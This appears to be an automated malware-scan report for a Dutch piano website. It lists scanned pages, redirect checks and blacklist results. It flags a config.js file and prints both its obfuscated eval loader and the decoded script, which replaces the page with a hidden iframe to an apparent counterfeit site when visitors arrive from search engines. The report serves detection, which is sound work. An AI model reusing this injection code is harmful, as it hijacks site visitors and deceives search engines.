Scanned pages/files
Request | Server response | Status |
http://www.pianovossen.nl/ | HTTP/1.1 302 Found Cache-Control: private Date: Thu, 18 Dec 2014 12:27:32 GMT Location: /Default.aspx?H=1&S=1.1 Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=bl4fdx551rm1d145ylaq4czy; path=/ X-AspNet-Version: 1.1.4322 X-Powered-By: ASP.NET | clean |
http://www.pianovossen.nl/default.aspx?h=1&s=1.1 | 200 OK Content-Length: 21880 Content-Type: text/html | clean |
http://www.pianovossen.nl/DefaultPV.aspx?H=3&S=3.6 | 200 OK Content-Length: 25723 Content-Type: text/html | clean |
http://www.pianovossen.nl/DefaultPV.aspx?H=4&S=4.1 | 200 OK Content-Length: 28300 Content-Type: text/html | clean |
http://www.pianovossen.nl/Default.aspx?H=6&S=6.1 | 200 OK Content-Length: 20687 Content-Type: text/html | clean |
http://www.pianovossen.nl/ndzrtf/louis-vuitton-denim.html | 200 OK Content-Length: 5018 Content-Type: text/html | clean |
http://www.pianovossen.nl/ndzrtf/config.js | 200 OK Content-Length: 1296 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. eval(String.fromCharCode(118,97,114,32,114,101,103,101,120,112,61,47,92,46,40,97,111,108,124,103,111,111,103,108,101,124,121,111,117,100,97,111,124,121,97,104,111,111,124,98,105,110,103,124,49,49,56,49,49,52,124,98,105,115,111,124,103,111,117,103,111,117,124,105,102,101,110,103,124,105,118,99,124,115,111,111,117,108,101,124,110,105,117,104,117,124,98,105,115,111,41,40,92,46,91,97,45,122,48,45,57,92,45,93,43,41,123,49,44,50,125,92,47,63,47,105,103,5 ...[844 bytes skipped]... Decoded script: var regexp=/\.(aol|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\/?/ig; var where=document.referrer;if(regexp.test(where)){var body=document.body;body.style.visibility='visible';body.innerHTML="<iframe name='framain' frameborder='0' height='2500' scrolling='no' src='http://lvhome.jp' width='100%' />";} var regexp=/\.(aol|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\/?/ig; var where=document.referrer;if(regexp.test(where)){var body=document.body;body.style.visibility='visible';body.innerHTML="<iframe name='framain' frameborder='0' height='2500' scrolling='no' src='http://lvhome.jp' width='100%' />";} | ||
http://www.pianovossen.nl/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.pianovossen.nl/Default.aspx?H=2&S=2.3 | 200 OK Content-Length: 25662 Content-Type: text/html | clean |
http://www.pianovossen.nl/10JaarPianoVossen.zip | 200 OK Content-Length: 302837 Content-Type: application/x-zip-compressed | clean |
http://www.pianovossen.nl/images/cdhoesje10JaarPianoVossen.zip | 200 OK Content-Length: 301477 Content-Type: application/x-zip-compressed | clean |
http://www.pianovossen.nl/defaultPV.aspx?H=2&S=2.2 | 200 OK Content-Length: 23950 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pianovossen.nl
Result:
GET / HTTP/1.1
Host: pianovossen.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pianovossen.nl
Referer: http://www.google.com/search?q=pianovossen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pianovossen.nl
Referer: http://www.google.com/search?q=pianovossen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pianovossen.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pianovossen.nl/
Result: pianovossen.nl is not infected or malware details are not published yet.
Result: pianovossen.nl is not infected or malware details are not published yet.